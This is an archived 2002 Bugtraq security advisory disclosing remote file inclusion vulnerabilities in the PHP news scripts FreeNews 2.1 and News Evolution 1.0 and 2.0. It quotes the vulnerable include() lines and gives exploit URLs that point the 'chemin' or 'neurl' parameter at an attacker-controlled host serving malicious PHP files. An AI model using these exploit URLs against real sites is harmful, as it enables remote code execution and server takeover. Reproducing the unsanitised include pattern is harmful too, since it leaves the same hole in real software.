Bugtraq mailing list archives
FreeNews & News Evolution (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Tue, 26 Nov 2002 17:43:49 +0100
Informations : °°°°°°°°°°°°°° Problem : Include files a) ------------------- Product : Freenews Version : 2.1 Website : http://www.prologin.fr ---------------------- b) ------------------- Product : News Evolution Versions : 1.0, 2.0 Website : http://www.phpevolution.net ---------------------- PHP Code/Location : °°°°°°°°°°°°°°°°°°° a) freenews 2.1 aff_news.php : ------------------------------------------------- include ("$chemin/config.php"); include ("$chemin/options.inc.php"); include ("$chemin/freenews_functions.inc.php"); ------------------------------------------------- ... b) News Evolution 1.0 aff_news.php : ------------------------------------- include ("$chemin/config.php"); include ("$chemin/functions.inc.php"); include ("$chemin/options.inc.php"); ------------------------------------- moteur/moteur.php : -------------------------------------------------- include ("$chemin/moteur/moteur_form.php"); include ("$chemin/moteur/moteur_tab_results.php"); -------------------------------------------------- export_news.php : --------------------------------------- include ("$chemin/config.php"); include ("$chemin/functions.inc.php"); include ("$chemin/options.inc.php"); include("$chemin/exporthtm.inc.php"); --------------------------------------- ... c) News Evolution 2.0 backend.php : --------------------------------------------------------- include_once("$neurl/admin/modules/rss/easyRSS.inc.php"); --------------------------------------------------------- screen.php : --------------------------------------------------------- include_once("$neurl/admin/cfg/configsql.inc.php"); include_once("$neurl/admin/cfg/configscreen.inc.php"); include_once("$neurl/admin/cfg/configsite.inc.php"); include_once("$neurl/admin/cfg/configtache.inc.php"); include_once("$neurl/admin/$sitelang"); include_once("$neurl/admin/fonctions/fctscr.php"); include_once("$neurl/admin/fonctions/fctadmin.php"); include_once("$neurl/admin/fonctions/fctform.php"); include_once("$neurl/admin/modules/cache.php"); --------------------------------------------------------- admin/modules/comment.php : --------------------------------------------------------- @include_once("$neurl/admin/cfg/configscreen.inc.php"); @include_once("$neurl/admin/cfg/configsite.inc.php"); @include_once("$neurl/admin/$sitelang"); --------------------------------------------------------- ... Exploits : °°°°°°°°°° a) freenews 2.1 http://[target]/aff_news.php?chemin=http://[attacker] with http://[attacker]/config.php http://[attacker]/options.inc.php http://[attacker]/freenews_functions.inc.php ... b) News Evolution 1.0 http://[target]/aff_news.php?chemin=http://[attacker]/ with http://[attacker]/config.php http://[attacker]/functions.inc.php http://[attacker]/options.inc.php ... c) News Evolution 2.0 http://[target]/screen.php?neurl=http://[attacker] with : http://[attacker]/admin/cfg/configsql.inc.php http://[attacker]/admin/cfg/configscreen.inc.php http://[attacker]/admin/cfg/configsite.inc.php http://[attacker]/admin/cfg/configtache.inc.php http://[attacker]/admin/fonctions/fctscr.php http://[attacker]/admin/fonctions/fctadmin.php http://[attacker]/admin/fonctions/fctform.php http://[attacker]/admin/modules/cache.php ... Patch : °°°°°°° http://www.phpsecure.org More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/NEfree.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
Current thread:
- FreeNews & News Evolution (PHP) Frog Man (Nov 27)